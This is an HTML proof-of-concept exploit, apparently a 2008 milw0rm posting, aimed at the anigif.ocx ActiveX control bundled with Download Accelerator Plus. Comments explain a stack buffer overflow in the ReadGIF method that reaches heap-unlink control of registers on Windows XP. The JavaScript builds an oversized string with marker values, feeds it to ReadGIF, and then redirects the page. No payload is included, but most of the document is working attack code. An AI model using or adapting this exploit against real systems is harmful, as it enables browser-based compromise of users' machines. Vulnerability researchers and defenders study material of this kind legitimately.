32 lines
No EOL
930 B
HTML
32 lines
No EOL
930 B
HTML
<html>
|
|
<body>
|
|
<object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' />
|
|
</object>
|
|
<script language=javascript>
|
|
|
|
// anigif.ocx by www.jcomsoft.com can be found distribuited with some applications,
|
|
// I found it in Download Accelerator Plus 6.8.
|
|
// DAP comes with an old version, but the last from jcomsoft is also vulnerable:
|
|
// there's a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods,
|
|
// the funny thing is that after the first exception that will be handled by IE,
|
|
// when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx
|
|
// with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap
|
|
// overflow scenario.
|
|
|
|
var buf;
|
|
for (var i=0; i<259; i++) buf += "X";
|
|
|
|
buf +="BBBB";
|
|
buf += "CCCC";
|
|
|
|
for (var i=0; i<5728; i++) buf += "H";
|
|
|
|
target.ReadGIF(buf);
|
|
|
|
window.location = "http://www.google.com";
|
|
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
# milw0rm.com [2008-08-10] |